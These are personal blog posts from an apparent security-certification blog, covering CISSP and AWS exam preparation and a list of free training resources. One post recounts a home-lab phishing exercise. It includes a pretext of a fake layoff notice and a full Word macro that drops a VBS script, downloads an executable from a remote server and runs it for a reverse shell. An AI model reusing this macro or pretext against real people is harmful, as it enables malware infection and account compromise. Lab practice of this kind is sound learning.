I saw this day a countless amount of times in the last two months. Typing this blog post after passing the exam, is a surreal feeling. Forecasting a goal, envisioning its completion, and driving it home is the things fairy-tales are made of. How the air smells at that time? What does it taste like? Why I deserve it? How all the countless hours of study I am willing to endure would eventually lead to pay-dirt and once again, me on top! Triumphant. How relieved I’d be? How much elation I’d be feeling. Like having a superpower to force anything I want into existence. Gotta have that vision!

I’ll get to what studying looked like, felt like, exam review dialogue and such soon. Yes! This post is LONG. But guess what I’m the one who had to write it. I didn’t do it for myself, I did it for you. The length was dictated by however many words I needed to produce a post with the context of what I would have wanted in hindsight after passing the exam. Most of the blogs I see are humble brags of people looking for everyone to kiss their feet since they passed it. Some are really good like the ones at the end of the post. Some are long and list out key things you should be on the lookout like CMMI or BCP without any other context. Continuing by saying how it was the MOST difficult test of their life, they felt like they were going to fail when the test ended. I just don’t think this is or has to be the typical case. Anyone can pass CISSP – keep reading and I’ll detail how to study and why most of the practice materials are broken. You could extrapolate something out of that too (if you only use the recommended study materials you will fail).

The point needs to be restated that I think the journey is the most valuable portion of attempting certifications not the actual cert. This one for instance, proves you are not only familiar with all the content from the 8 domains, but also, able to synthesis and apply it to scenario-based situations using sound risk management principals acting as an Information Security Manager. Not only do I want to provide a valuable resource for exam preparation but also give you insight and texture into my life during the entire process.

Part-1: What’s My Motivation?

Time: Late December 2019

Self Introspection (self observation) – is important as it’s a kind of regular check on self development which helps you to know what we have achieved so far.

I was promoted in December 2019 to Application Security Manager (for context). Christmas is a really special time in the Caribbean so I try to be there every year during that holiday period. (That’s how you end the year baby ) So literally the next day after getting home from the trip (still having a week off before I go back to work) I start to get the feeling. Anybody know what I’m talking bout? The thirst? Watch TV for maybe a few hours, go out a day, chill then it’s like “What am I doing with my life? What’s all this idle time I have? How do normal people do nothing for most of their lives? Happens to me every time

I had preconceived thoughts about CISSP honestly. “It’s typical to fail on first try” … “It’s a management exam” … “It’s an inch deep mile wide”  … “Reddit horror stories”  … “Folks literally studying on average 6 months some 1 year”. After doing some research I decided it was the one for me. Not only would it give some sort of legitimacy to my new position, it would, in addition, significantly broaden my understanding of Information Security and Risk Management.

I ordered the following studying materials the same day based on research from CISSP sub-reddit:

• CISSP Official (ISC)2 Practice Tests 
• Eleventh Hour CISSP®: Study Guide 
• (ISC)2 CISSP Certified Information Systems Security Professional Official Study Guide

Major S/O to that sub it’s a trove of information! That’s part of why blog. As to keep this process continually flowing. Provide helpful materials to those after you.  We have to realize 90% of the time we’re acting as consumers not producers. I think it takes a certain level of appreciation for the field overall to be devoted to giving back in whatever form you can. We all have something we can contribute

Life happened and I wasn’t able to start studying immediately. Shame because I got a free same-day delivery of the books. I never even opened the package when it came. Put it in my office and it sat there for most of January.

Part-2: What Was The Preparation Like?

Time: End of January 2020

Thinking about sports and basketball in particular – How many free throws might a average player shoot per day when trying to improve their percentage? 50 free throws per day? 100? 500? That number may actuality be well around 2 thousand or more. Now lets abstract that a little and dumb it down for a second. It’s not going to be anything novel. You need to consistently be shooting your free throws. In this case it all the practicing, reading all the materials from different sources, doing more practice questions, flashcards it’s all apart of the process. You can’t go a weekend without studying, or even a day. Consistently & repeatedly!

You guys know by now, there’s nothing special about me I just feel like when I really want something there an insatiable thirst to quench and borderline obsession maybe for me to get it. I guess what I’m trying to say is I know how to “Lock In”. I literally had hundreds of unanswered LinkedIn messages, DMs, text everything. I cut everybody off and focused at the task at hand. It would need my upmost attention at all times. There’s absolutely no going out, minimal TV, if I’m commuting I’m reading, if I’m on break I’m reading or researching, when I get home I’m getting settled at say 5 pm and then grinding till I’m dosing off. In bed i’m reading. When I wake up before I get out the bed I’m reading. Around this time is when you realize you could live with someone and be a complete stranger to them in the same house So some of the attributes that describes someone in this stage is consistency, dedication, resolve, discipline, resiliency.

You have to REALLY want it. When you do you are laser-focused. As random as this is I see myself in my head as i’m typing this as heat-seeking missile. I’m coming in hot and I will not miss! I care about accuracy and precision. You get the picture. Whatever it means to you – “Lock In” that’s the mode you need to be in – keeping in mind it’s a marathon not a sprint. Life will happen some days you’ll be much more motivated than others – but anything in your control better be related to CISSP.

• Sybex Official Study Guide 8th Edition  (8/10) – This behemoth took me about 2 weeks to finish. I didn’t read it intently but more skimming and identifying what I absolutely don’t know, or if I know something’s right for the wrong reason. You can register the Sybex book along w/ the practice test on the Wiley test bank. It allows you to take the chapter questions in the exam atmosphere instead of writing in the book as well as practice exams. All your work is tracked and saved. After I finished reading the book I registered it and proceeded to go thru each domain’s chapter questions. I would say my average was in the 60’s for most of them. Bunch of new material, definitely vast amount of knowledge you need for every single domain. I was familiar with the SDLC / Security Testing / IR domains from work related experience. Gets two dings for being so damn big. Very useful but again it’s not something you can use alone to pass exam despite it being the “Official Study Guide”
• Kelly Handerhan’s (9/10) – Sadly these aren’t free anymore She really does an amazing job of relaying complex topics in easy digestible manner. She also gives you the 2nd half of what you need to pass, the mindset. Even with the recent price change I still think this worth however much it cost. You won’t read one Reddit or ISC2 post that doesn’t mention her. Gets a ding since you can’t alone pass exam with this.Scored low on my first Sybex Practice after her videos. I spot checked which domains I was coming up short in and went back to read it in the Sybex book again.
  Boson Test Engine (8/10) – One of the most valuable resources. Great bank of test questions that have amazing well written thorough explanations. The secret sauce here is no matter if you get an answer incorrect or not you read the explanation. You’re confirming here if you were right for the wrong reason, or why you were wrong, or in what scenarios may one of the answer could possibly be right in another situation. That’s the beauty of Boson. This helps you identity where you’re weak. Guess what you do after? You use the book or another source (tons of material out there) to better understand whatever it is.The reason Boson gets 2 dings is that the beauty is in their explanations not necessarily the questions. Which in hindsight are way to technical. Which are reminiscent of all the study material test.
• It’s now about mid-February and a blessing falls from the sky directly into my lap. I find my MOST valuable resource.
  Discord CISSP Server (12/10). This type of forum was perfect for most of my learning when tackling technical certs so I knew it would push me here. We’re equally amazing but some unmatched wisdom in there for sure! This drastically improved the amount of information you retain as well as increase the depth of such information respectively. I think this is the case because you’re not just you in your head alone in your room with a book. You’re now defending your argument on a particular question, or understanding why you’re wrong, this goes on 24/7 since the group is global. 4 pm EST or 4 am there’s going to be active discussions ALWAYS going on. There’s a psychological aspect to this as well. Feeling like you’re alone in a fight is depressing. Having an active army of mission-oriented soldiers all ready to fight, defend and operate ?! Oh now this is a whole different story! Don’t underestimate the power of a topic being explained to you by a person instead of a blog post. I’ll forever be apart of this channel – definitely my new brothers and sisters. Blame most of me passing on them!
• I start to do a million practice questions from anything I could find books, practice sites, old materials. I guestimate I did over six thousand practice questions. I can remember off hand doing 1300 in a 2 day hiatus At this point I’m at about 5 hrs a day on weekdays and at least 12+ hrs on weekends #overdrive
• Sari Green’s CISSP (9/10) course. Decided to change the pace a little bit. This was awesome very helpful with the most important thing being she delivers the material with a strong risk management undertone. Another thing was how she aligned the entire course based on the sections in the CISSP domain outline. Gets a ding since the material is about 5 years old so it misses new information about some of the topics. Like IOT SCADA Embedded Device. Recommended.
• Mike Chapple LinkedIn Learning CISSP (9/10) course. Very good! The course is taught in a way that isn’t typical of what you’d expect in a CISSP course. The way he provides practical realizations of the topics to seal it in is incredible. You can remember PGP until the cows come home get hit with a question and totally only know that PGP stands for Pretty Good Privacy memorization won’t help you in the exam. He shows you in real-life implementations of the exam topics. Wonderful course.
• After I finished all those I started from domain one and did the following for all 8 domains
  • Read Sybex chapter summary
  • Read 11th hr chapter summary
  • Watch Sari domain summary
  • Do Mike Chapple practice questions for associate domain

• We’re at about 2 weeks out now time wise. I started to read all the NIST documents related to the major processes in the various domains. These actually were well written and I learned to love them. Every night I would open them and try to relate everything I was doing back to risk management. I’m still doing practice problems but maybe like 10 a day at this point. Most of my time is spent trying to understand the SDLC in depth, the IR process in depth, the BCP/DR process in depth. You not only need to understand the order of the processes but all the details & outputs that come from each.
• (Maybe one month ago 2 member of the squad from Discord discovered we all have the same exam date) The day before exam I get hit up to join a conference with both of them to do so last day studying. Without this I wouldn’t have passed. We spend 10 hours going over all the major processes, ironing out our understandings and tying relate everything back to the RMF. It’s 10 pm night before exam and boy I’m thinking I probably shouldn’t have did all of that studying today in fear of cramming and losing it. I’m also pissed at myself for drinking a redbull 30 minutes earlier. Because I should be sleeping but a hr has gone by and I’m still wide awoke – I hope I get to sleep soon in fear of not getting good rest and failing.

Part-3:  You Didn’t All This Work For Nothing, Did You?

Time: Mid-March 2020

When I scheduled my exam I purposely chose a Saturday morning. I did not want to deal with the variables that a “normal” morning commute might include – so I was going to be lazy and Uber to the testing center. Now being so paranoid I just drove there and paid the crazy fee to park in the garage. I listened to Kelly’s “Why You Will Pass The CISSP” video and Larry Greenblat “CISSP Exam Tips” videos before leaving the car. Crazy only seeing about 4 people when on a regular day – a low amount normally would be around 50-100 and tons of traffic at any given time – people jogging, women pushing strollers, people and their dogs, as well as tons of business folk – it’s directly across the street from a train station.

At this point, the sports reference is to boxing. Here’s my thoughts walking to from the garage to exam center – “You did not come this far to lose did you? You’ve been wrong countless amounts of time on Discord and understood why. You worked your buns off! You learned the material, the mindset, you’ve watched hundreds of videos, did thousands of questions, read tons of pages. You’ve got some of the most distinguished practical offensive certs in existence, are you going to let a multiple choice management exam that most people fail because they don’t slow down to read defeat you? You’re going to knock this exam on it’s face. You already visioned this day many times before.  This is going to turn out just like all the other times – you put in the work and the results are going to prove such is true at the end. If you synthesized the information the way you think you do you’re going to do amazing” This is how I’m I’m trying to make myself feel

In reality I’m scared as shit about this exam it’s not that I don’t the material – its I don’t know what I don’t know. Most people on Reddit say when they see the first 25 questions they sometimes wonder if the proctor configured them for the wrong exam Here’s what calmed me down sorta grounded me. I had small talk with a guy as we’re walking to bathroom and we ask one another what we’re up against this morning. Turns out him along with 90% of the other people there (16 total) were taking their medical exam. It was 7 hrs! I literally said to myself “Shitttt boy you got it good!” It’s all relative My number gets called and I get seated for the exam. They had disposable covers for the noise cancelling headphones

I had this plan to write all my brain dump stuff on the pad they gave me before starting. You get 5 minutes to read and sign NDA. One of the things I wanted to write down was the forensic process. I started to list them out and got stuck after the “Collection” phase – It’s scares the living fucking daylight out of me. I said “F-This” and clicked “Start Exam” true story

Part-4: Put Up Or Shut Up!

The questions didn’t seem like they were designed to trick me. I was comfortable with the terms in most questions. The difficulty is in the subjective and vague nature of all the questions. Unlike the practice question which test if you know terms and definitions, the exam places you in scenarios where you play from the perspective of a security manager and have to apply sound risk management principals – remembering your job is to reduce risk, provide information for senior management and apply the appropriate level of protection to your assets depends on their value and classification. Most of the questions are BEST, LEAST, WORST with all the possibly choices either being all right or all wrong. On a bunch of occasions I was able to eliminate 2 off the jump. The remaining 2 choices are what’s going to keep you up at night. I got a crazy subnetting question that I attempted to start breaking down on my pad to binary and do the power of 2’s after 20 seconds I said “F – This” and clicked “Next“. There were some gimmie’s sprinkled in there as well. Don’t forget “inch deep, mile wide” it’s way too much material for every single question to be a boulder. I made sure to slow down scrutinize every word in the questions, re-read all questions and answers and reading back the answer I chose. If a question was “Blah blah blah .. Which of following feature of Digital Signatures would BEST provide you with a solution to prevent unauthorized tampering?” … And the answer is integrity … Before moving on I’d say “Integrity is the feature of Digital Signatures that best provide the solution to the problem” … Here’s what I saw most followed by question to illustrate the context for each one:

• SDLC Related – What SDLC is Change Management most likely to be apart of?
• BCP Related – A global pandemic of a deadly virus is on the brink. How does the BIA help you determine your risk?
• IR Related – The sky is falling and something just hit you in the head. What process of IR are you most likely in?
• Bunch of stuff on Access Controls – How can i best protect this if that?
• One question of Encryption – Understand PPP L2TP PPTP L2F their succession which ones can use IPSEC, EAP
• Bunch of Risk Management – Something just happened you need to do something. With these constraints. What’s best?
• Asset and Data Classification/Security – Why do we classify anything?
• Web Application Attack Recognition – Seeing and recognizing attacks described through a scenario or graphical depiction
• US and Global Privacy Frameworks – GDPR – ECPA – OECD
• Roles and Responsibilities – Who’s MOST important for security? CISO CEO ISM ISSO?
• Communication & Network Security – What layer is LLC most likely apart of ?

I was nervous as hell clicking “Next” on the 100th question. I knew if exam ended I either did really well or really horribly also if it continued I knew I was exactly on the borderline and could still pass up to 150 but each question would have to be correct. If that was the case I wouldn’t have been pissed but I didn’t want that to occur to even have to be in that situation. The exam stops. I’m like “HOLY SHIT”. I get the TA’s attention, she signs me out and I go to the reception area to get the print-out. The receptionist was at the bathroom had to wait 5 minutes for her to come back. I was pacing so much the entire time I probably could have burned a hole in their damn carpet. The lady takes my ID and prints it out the result, peaks it, folds it and gives it to me looking me dead in the eye with a straight face. But I did notice it was one piece of paper and people said if you get one paper you pass – if you get more it’s because you failed and that’s the explanation of the domains you came up short in. I opened it and saw I had PASSED I threw the wildest air punch in history, luckily didn’t hurt myself, jump up and down a little (nobody else in reception area at this point, say “LET’S GO” as loud as I can (since the students are literally just around the corner) and notice the receptionist now smiling so said “Congratulations sorry I had to mess with you” Here’ it was guys that moment of passing that I visioned! Slaying the dragon. What a wonderful feeling

Part-5: Thoughts?

If you’ve made it this far s/o to you! I’ll never write a TL/DR ever The context matters … The journey matters.

My biggest advice would be to make the NIST RMF, SDLC and all the related documents your friend. These are going to help you substantially more than doing a zillion practice questions or reading the huge books. Also it sheds light on why so many smart technical folk fail this exam the first time. The day before the exam me @Beedo @Reepdeep MAJOR S/O TO THOSE GUYS – WHO ALSO PASSED THE SAME DAY studied from 1 pm to 10 pm going through all the processes from each domain, in our own words, understanding the steps to the process but understand how every single thing is tied back to risk management.
NOTE: We think the document we created could help everyone out there out as a definitive source for passing the exam. Obviously folks need to get back to the real life and people they’ve neglected since beginning the journey but it’s something we all feel strongly about and want to provide to the community hopefully soon

Part-6: Things I Shared on Discord That I Think Should Be Included Here?

These are just excerpts but I figured they maybe valuable since you forget basically everything related to the exam afterwards.
Bear with me as the grammar may not be perfect it’s Discord so I’m not necessarily caring if I make a mistake to correct it. It’s conversational texting-like language. Most of it being typed from my phone.

In regards to the difference in seemingly all the practice material vs real exam:

“I see why all the practice material miss the mark. It’s because you truly need a intelligent person to be able to spend the time to make those questions and that person cost too much to write free questions on the internet for us .. Those aren’t ones you come up with based on a definition .. You understand someone thought deeply about this, so much so they knew the answer I’d immediately go for (and it’s wrong) is included as say answer A and make the right answer further down the list like D. You need to be very careful. Also saw 2 similar looking answers where you jumped immediately to the answer and didn’t thoroughly read it would have noticed the 2nd one further down was more right”

In regards to our day before exam study conference: 

it was impromptu as hell I was just going each of my Boson question explanation. It lasted lot longer than expected went from like 1-10 yesterday on conference, went over each process understanding it and connecting the SDLC steps BCP steps back to RMF I’m sure they’ll agree understanding how everything relates back to RMF is the way to pass. Not technical … Not all the questions … Since they’re way to technical (use em to identify and reinforce you’re weak areas) we were already studied up at that point … Sybex/Boson/AIO/All the sources questions way to hard if we talking scope for exam. You’ll be placed in a bunch of situations where you’re somebody in security what’s BEST LEAST solution for this scenario.

On depth of question and context. Keep in mind we already knew the blocks lengths, key size ect:

For context it’s like understanding AES is a strong symmetric algorithm, DES is a weak one that shouldn’t be used. But not that 3DES EEE has a xyz length bit size and it goes through xy rounds – the latter is unnecessary .. If you know it so be it but that’s how I would scope everything. High level and how does is connect back to RMF .. I would read the RMF and SDLC NIST doc every night

On what I think is useful studying:

I’m saying you’ve read Sybex or over big book feel comfortable been browsing reddit know the sources the videos and all the questions we do here then can go through the 11th hr and understand everything then I would focus on the processes and how it relates to RM SDLC, IR, BCP knowing how those relate was my entire exam. I had a bunch of SDLC stuff lot of OWASP what vulnerability is this? Few question from domain 4 IPSec and understanding the protocol or layer.

Overall exam tips and thoughts:

“The exam was tough but I didn’t feel any point they were trying to trick or deceive me, every question was able to eliminate two answers of back. Some of the answers are similar then you figure out differences which was slightly hard in some cases some not. Felt familiar with all the terms answers. Question were clear. I didn’t even notice the experimental which I was on look out for. I think when studying we equate inch deep mile wide to difficult. In reality it’s just understanding how the domains work together. Remember every question CANNOT be a boulder. There were some gimmes… what is encryption… what is integrity for digital signatures type stuff. My best advice in hindsight with the above is DO NOT WASTE YOUR TIME doing all these questions, Boson, Ccure, Luke, Sybex. All of them! Only if you’re weak. If you can read 11th hr and notice everything nothings a shock stop. Understand how everything is bound by risk management. Btw I didn’t use the whole mgr mindset I just tried pick best 2 remaining options. There were plenty of answers that were “doing something” I threw those out automatically”

On how I would study differently:

“don’t worry and spend some time in the nist document’s 800-64 800-37 they all link to each other. So your thinking going through say SDLC is what am I doing in this step and how does it relate back to the RMF everything relates back to it. For example that in phase one of  the SDLC you have your requirements and stuff but you’re also initially understanding the systems that links back to step one in RMF which is Categorize, so think does this system store transmit or processes pii, what’s the risk. Or step two Development in SDLC, you know you starting design architecture development and testing, that relates to steps 2&3 (you also do risk assessment here) in RMF you’re identified the need for the system in initial requirements, so now in development we select the controls of the system and assess them that’s in SDLC phase two but you’re always grounded by RMF. See how that relates? I think that understanding this alone is how I passed”

Are questions from sybex syllabus or out of the box?
Wayy to technical as well as all the practice questions

Some people fail who had boson?
Boson shouldn’t be used to judge readiness just identity weak areas. You could get 20% on all bosons and pass since it’s mostly thinking not technical

How’s the difficulty level?
NOT DIFFICULT – DON’T BELIEVE THE HYPE – ALL OF US COULD PASS THIS EXAM

Do we need other source of study hindsight?
Read the NIST documents on all the processes and reclaim some of your time back

You are say every in this group can pass, can you tell your experience and main domain?
Mainly offsec and I do appsec at work for like 4 years. I’m an engineer so i have the fix it mindset by default. You don’t need be expert in anything. Just think of everything in risk mgmt is enough to pass

How long you have been preparing?
Studying since 1/28

What was difficult domain for you?
Domain 2 smh – Focus on 1,3,7 thought and definitely 8.. Obviously you need to be passing in all domains but since those weighted more it more advisable

Did you face any language mixing puzzle questions means they use different vocabulary 
There were NO gimmicks every question i knew exactly what they wanted.

Do you think feedback from people different industry get it more difficult than security?
It’s your understanding and mindset. Kelly and Larry tell you the mindset. I automatically threw any answer out that was “disconnect from network, make a firewall change”.

Did you feel it’s purely management?
No. Because being in mgmt although you’re not a doer you need to have a solid understanding of the underlying area no matter what it is.”

S/O to my Discord guys ALL OF YOU

I’ve included a section below on the links that were most valuable to me. Good luck & NEVER give up or give in!

Part-7: Links

• CISSP DISCORD – JOIN US !!!!!!!!!!!!!!!!!!!!!!
• http://luc.desfosses.fr/CISSP/
• https://www.reddit.com/r/cissp/comments/953oln/cissp_study_agenda_and_resources_16weeks/
• https://community.isc2.org/t5/Certifications/CISSP-questions/td-p/18626/page/2
• https://www.reddit.com/r/cissp/comments/b5zrpj/cissp_notes_and_some_useful_information/
• https://www.reddit.com/r/cissp/comments/98xef0/tips_from_passing_cissp_today_my_study_plan/
• https://www.reddit.com/r/cissp/comments/60pm3o/passed_3162017_here_are_my_notes_and_observations/
• https://www.reddit.com/r/cissp/comments/e9pd2j/passed_cissp_100_q_in_140_min_first_try_minimal/
• https://www.reddit.com/r/cissp/comments/879h46/key_processes_to_remember_for_the_cissp_exam/
• https://www.reddit.com/r/cissp/comments/48o7w1/some_useful_links_i_just_passed_the_exam/
• https://www.test-questions.com/cissp-test-20.php
• https://wentzwu.com/
• https://quizlet.com/358215788/test
• https://www.mhprofessionalresources.com/sites/CISSPExams/exam.php?id=AccessControl
• https://community.isc2.org/t5/Certifications/A-long-post-with-some-advice-tips-and-opinion-on-the-CISSP-exam/td-p/20827
• https://www.studynotesandtheory.com/single-post/Free-CISSP-MindMaps-by-Matheus
• http://www.prabhnair.in/unseen-topics-about-cissp-you-must-know/
• https://blog.ahasayen.com/cissp-exam-study-plan/

 

 

 

 

 

 

 

 

The post Slayed CISSP appeared first on Certification Chronicles.

Life after CISSP:

I had so much housekeeping that I couldn’t attend to while studying (physically and digitally). My office was a complete mess. I lost access to my switch since there was a power outage and sadly I didn’t copy running-config to startup-config. Off my switch is basically everything besides wireless. My ESXI lab, my NAS, all my Raspberry Pis, and everything else. It’s tough to go from risk management to configuring ACLS and VLANs Took me about a week to update (and save) switch configuration, cleanup my NAS, cleanup all my machines & VMs, destroy my ESXI lab and rebuild it. Just like before my ESXI lab simulates a corporate network, active directory environment with an assortment of machines running various services. I use PFSense as a virtual firewall/router. This allows you to simulate someone attacking over the WAN and having your LAN protected by a security device just like normal. You can google security courses, CTFs, to get an idea of typical lab environments. This is helpful because after you spend days importing/uploading/provisioning 5 VMs – now what? You still don’t have any services or applications running. This groundwork is fruitful we all have to spend the time to stand things up before we can even begin to start thinking about playing around.

---

Keeping Busy:

I begin to think about what I want to learn more about. I find an Advanced Penetration book focusing on adversary emulation and APTs that I fell in love with. It’s ironic as well because the only reason this book stood out was it was only 230 pages. I thought damn either this things is complete garbage and captures .01% of something irrelevant that some other guy loved or it’s chock full of gems. It was the latter! My heads spinning as we write our own VBA dropper, that writes a VBS file to the disk, that download the payload and execute reverse shell. At the end of chapter one we’re on writing your own C2C infrastructure implementing libssh. Just something about seeing that hardcore C with the Windows API calls that brings fear and so much curiosity! Progressively improving our payloads and infrastructure as it progresses. Here’s the book

I bet you can see where this is going. To reinforce concepts I replicated the payloads and attack from the book in my lab environment.
Here’s the scenario:

1. Somehow through password reuse you’ve gained access (attacker) to an organizations webmail login
2. As a budding hacker you understand situational awareness. Your target is an IT Administrator – whom is probably already a little concerned over his job security. Since through
   reconnaissance you’ve learned that 30% of the entire IT staff has already been furloughed since the pandemic began.
3. You craft a fake Word document that seems to be a notice of this months layoffs and “mistakenly” send it to the administrator. You dress it up really nice with all the Confidential headers and footers. Of course there is no document it’s a blurred image and enabling macros is going to begin and carry out the compromise. Is looks like this
   

   ---

   

   ---

   ---

   Payload:
Sub AutoOpen()
Dim PayloadFile As Integer
Dim FilePath As String
FilePath = "C:\tmp\payload.vbs"
PayloadFile = FreeFile

' Create VBS dropper, write it to disk and execute it. VBS reaches out to remote server downloads payload and executes it.
Open FilePath For Output As PayloadFile

Print #PayloadFile, "HTTPDownload ""https://REMOTE-SERVER/PAYLOAD.EXE"", ""C:\tmp\"""
Print #PayloadFile, ""
Print #PayloadFile, "Sub HTTPDownload(myURL, myPath)"
Print #PayloadFile, "Dim i, objFile, objFSO, objHTTP, strFile, strMsg, currentChar,res,decoded_char"
Print #PayloadFile, " Const ForReading = 1, ForWriting = 2, ForAppending = 8"
Print #PayloadFile, " Set objFSO = CreateObject(""Scripting.FileSystemObject"")"
Print #PayloadFile, " If objFSO.FolderExists(myPath) Then"
Print #PayloadFile, " strFile = objFSO.BuildPath(myPath,Mid(myURL,InStrRev( myURL,""/"")+ 1))"
Print #PayloadFile, " ElseIf objFSO.FolderExists(Left(myPath,InStrRev( myPath, ""\"" )- 1)) Then"
Print #PayloadFile, " strFile = myPath"
Print #PayloadFile, " End If"
Print #PayloadFile, ""
Print #PayloadFile, " Set objFile = objFSO.OpenTextFile(strFile, ForWriting, True)"
Print #PayloadFile, " Set objHTTP = CreateObject(""WinHttp.WinHttpRequest.5.1"")"
Print #PayloadFile, " objHTTP.Open ""GET"", myURL, False"
Print #PayloadFile, " objHTTP.Send"
Print #PayloadFile, ""
Print #PayloadFile, " res = objHTTP.ResponseBody"
Print #PayloadFile, " For i = 1 To LenB(objHTTP.ResponseBody)"
Print #PayloadFile, " currentChar = Chr(AscB(MidB(objHTTP.ResponseBody, i, 1)))"
Print #PayloadFile, " objFile.Write currentChar"
Print #PayloadFile, " Next"
Print #PayloadFile, " objFile.Close( )"
Print #PayloadFile, " Set WshShell = WScript.CreateObject(""WScript.Shell"")"
Print #PayloadFile, " WshShell.Run ""C:\tmp\PAYLOAD.EXE""
Print #PayloadFile, " End Sub"
Close PayloadFile
Shell "wscript c:\tmp\payload.vbs"
End Sub


   ---

4. The administrator viciously open the email, macro detonates, payload execute and you get your reverse shell.

Now that we got a way to execute payloads now on to converting the payload into a C2 host and setting the infrastructure! Here’s a videos of the process.

How’d I Get Phished from S7acktrac3 on Vimeo.

The post Pharm Raised Phish 😅🤠 appeared first on Certification Chronicles.

Hello Community,

Really terrible times we’re living in right now. It doesn’t help to literally be right in the “thick of it”. My family and I are unaffected at the moment. Praying for humanity at this point.

Anyways – there’s been a bunch of free goodies going on and I wouldn’t be proper if I didn’t attempt to put some of them in a central place to provide to others Hats off to these organizations since none of this was required at all.

Leave a comment if you’ve found something I haven’t mentioned for others who visit after you. Stay Safe

 

• PluralSight_Software Development-Information Security-IT Operations
• PentestSkills_Empire-Mimikatz
• SecurityInnovation_Secure Coding-Software Security/Hacking
• CyberSafe_Non-technical Beginner Hacking Videos
• Udemy_Technology-Leadership
• Nikon_Photography
• Skillshare_Technology-Business-Art-Requires-CC-Remember-To-Cancel
• ClassCentral_Free-University-Courses-Variety-Of-Subjects-With-Certificates-XD
• Google_Free-Month-Google-Cloud-Training
• Oracle_Free-Cloud-And-DB-Training
• Manning_Free-Beginner-Programming-Books-HTML-CSS-JS-PYTHON
• Autopsy_Digital-Forensics
• From An Old Buddy/Colleague! Learn BURP Suite
• ECCouncil_30-Days-Free-Cyber-Training-Requires-CC-Remember-To-Cancel
• Packt-Free-Workshop-Access
• Juniper_Junos-Genius-Challenge-Package-Code-junosgeniusfree
• Hoppers_Roppers
• Free-Elastic-Training
• Cisco_PCAP-Programming-Essentials-in-Python
• Azure_Fundamentals-And-Voucher

Note: I get no credit for any of this! I’m simply compiling the materials in one place for you

The post Free Cyber Materials BC Of Covid appeared first on Certification Chronicles.

 

 

When the dust settled here’s what I was left with

Date: Monday 05/04/2020 – 1800 hrs
Thoughts: “You should be embarrassed at how severely deficient you are in practical cloud knowledge.”

Background

This is exactly how all my journeys begin (inside my head) typically being judgmental and unfairly harsh on myself. That evening I started to research the cloud market share of Amazon, Azure and Google. It confirmed what I suspected with AWS leading (~34%) Azure having roughly half of AWS (~17%), Google (~6%) and the “others” accounting for the rest. Note: Although Azure owns half of AWS in market share percentage, their annual growth is double that (62%) of AWS (33%). I would start with AWS.

Now where do I begin? I reviewed their site listing all the certifications and proposed paths to achieve. Obviously the infosec in my veins wanted to go directly for the AWS Security Specialty but I decided not do that. Why? Figured I would be cheating myself. I would start at the foundational level and progressively work towards the Security Specialty. To appreciate the view so-to-speak. Security Specialty would be my end goal.

I fumbled my way through deploying AWS workloads previously. I used EC2 before (didn’t know what it stood for or anything beyond that – a VM in the cloud was the depth of my understanding), S3 was cloud storage (that I constantly read about being misconfigured leading to data exposure).

As always, there’s absolutely zero pressure on me. Only the pressure of myself which is probably magnitudes worse and more intense than what anyone from the outside could inflict on me.

---

AWS Certified Cloud Practitioner CLF-C01

The next day I began researching Cloud Practicioner. This involves a ton of sophisticated research better known as Google in addition to, trolling all related Reddit threads that I can find. This is how I narrow down what are the best materials to prepare and what to avoid. 99% of my questions have already been answered.

After the scavenger hunt I felt like I could probably pass this one without doing any studying at all. Sometime I have to get outside of my own head. Not sure why I have all the confidence but it’s there (for no reason  in this case) and sometimes it burns me (keep reading).

I sped through the Linux Academy Practitioner course in 3 days. It was mostly review and everything you would expect for a foundational course. Some of the topics:

• • What is the cloud & what they’re made of
  • IAM Users, Groups, Roles
  • VPCs
  • EC2
  • S3
  • Cloudfront & DNS
  • AWS Billing

Date: Monday 05/09/2020 – 0800 hrs

From initial thought, it’s 5 days later. Exam scheduled for 1800 hrs I’m excited but nervous, unsure what to expect. The course prepared me well and the exam felt easy. I knew by the last question I had definitely gotten enough points to pass. I click next on the last question to end exam. AWS in a horrible play forces you to answer a survey before providing you the result.

I PASSED! You have to wait for a day or two to get the official notice that has a numeric score.

---

AWS Certified Solutions Architect – Associate SAA-C01

I clapped for myself but didn’t feel like I had done much. Practitioner is labeled foundational for a reason. Now it’s time to aim for a bigger target. Solutions Architect wouldn’t be easy it would take a whole heap of studying to clear it. I followed a similar approach going through the Linux Academy Solutions Architect Associate course.

Funny how the brain works because although Practitioner was easy it still gave me a chip on my shoulder going into this. Pick a post on Solutions Architect Associate and you’ll hear the pain, how tough it was, how it was most challenging cert of folks lives. I know from CISSP not to listen to this. I’m not sure if folks don’t fully prepare or just feel better about themselves exaggerating the complexity after passing to continue the horror stories. Maybe impose some of the fear they had onto others who are coming behind them?  One thing about me, I get tired of studying for the same thing quick. There’s no way I would/could ever study for a cert for 5 months, 6 months, a year. Yeah-Freaking-Right.

The cool thing about AWS is that all the certifications are built upon the foundation. No matter which one  you go for it’s pretty much going deeper into the usage, capabilities of appropriate related services. I chose to sit for C01 although C02 was recently released I wasn’t going to risk being a live beta tester. I was concerned with the newer exams’ stability. As I write this C01 is officially dead in 3 days, July 1 2020 then all candidates will only have C02 good luck .

Date: Monday 05/014/2020 – 0800 hrs

5 days later after Practitioner (10 days total elapsed time from initial thought)

Okay I told you to keep reading I wish somebody would have stopped me. Since no one did the universe had to step in. In a cocky rage I take the exam after studying for only 5 days. Clicking through the survey I was heartbroken I had FAILED and I really deserved it. Who the hell did I think I was?

This is typically the time where you punch yourself and call yourself stupid. This hurt me more than it should have. I was pissed at myself. For not taking enough time to study, sure but the real hurt was because I couldn’t will myself to pass even with minimal studying. LMAO. (WTF Bro) Here’s what I woke up to the next day.

What I only missed it by 20 points FML that made it worse.

You BIG Dummy!

Okay. I picked myself up and scheduled my retake for exactly 2 weeks out. After seeing that score I felt like if I could have retook it the next day I would have passed (again idk why, maybe that’s my way of dealing with failure, going even further balls to the wall ) The mandatory 2 weeks felt like forever. I was studying at least 6 hrs a day on weekdays and sun-up to sun-down on weekends. Nothing or anyone could get any of my time. Besides this, the only other cert I ever had to retake was CRTP. It humbled and fueled me more.

I figured I needed to learn from an alternative source – I went to AcloudGuru’s course which I felt was really lite compared to Linux Academy. The last week I found this Udemy course. Stephane Maarek the instructor is the Thank You sir! In hindsight I could have used this alone to pass the exam. It was that good. Here’s another review I found useful while preparing for my retake. Thank you Jayendra

Date: Monday 05/28/2020 – 0800 hrs

14 days later after 1st Solutions Architect Associate attempt (24 days total elapsed time from initial thought)

